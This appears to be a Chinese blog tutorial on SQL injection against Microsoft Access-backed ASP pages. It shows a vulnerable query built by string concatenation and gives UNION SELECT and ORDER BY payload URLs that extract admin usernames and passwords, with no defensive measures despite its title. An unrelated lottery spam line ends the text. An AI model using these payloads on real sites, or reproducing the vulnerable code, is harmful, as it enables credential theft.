office交流網--QQ交流群號

Access培訓群:792054000         Excel免費交流群群:686050929          Outlook交流群:221378704    

Word交流群:218156588             PPT交流群:324131555

Access安全防范-SQL 注入

2017-09-06 08:00:00
zstmtony
原創
1469



SQL注入之access

access三大攻擊手法

1.access注入攻擊片段-聯合查詢法

2.access注入攻擊片段-逐字猜解法

3.工具類的使用注入

Sql注入產生條件

1.必須有參數傳遞

2.參數值帶入數據庫查詢并執行

 

Access注入是暴力猜解

Access數據結構(access只有一個數據庫)

Access數據庫

表名

列名

數據

  

該頁面asp的sql語句

<%
id=request("id")
sql="select * from product where id="&id
set rs=conn.execute(sql)
%>

1.access注入攻擊片段-聯合查詢法(union)

判斷注入

猜解表名

猜解列名

猜解數據

Order by 22 22 代表查詢的列名的數目有22個

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 正常

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 錯誤

 

猜解表名 確定存在admin表名

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

 

猜解列名 猜解數據

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

 

表名和列名猜解成功率不是百分百,猜解不到解決辦法?

1.字典文件收集(社工)

2.Access偏移注入

分享
北京十一选五基本走势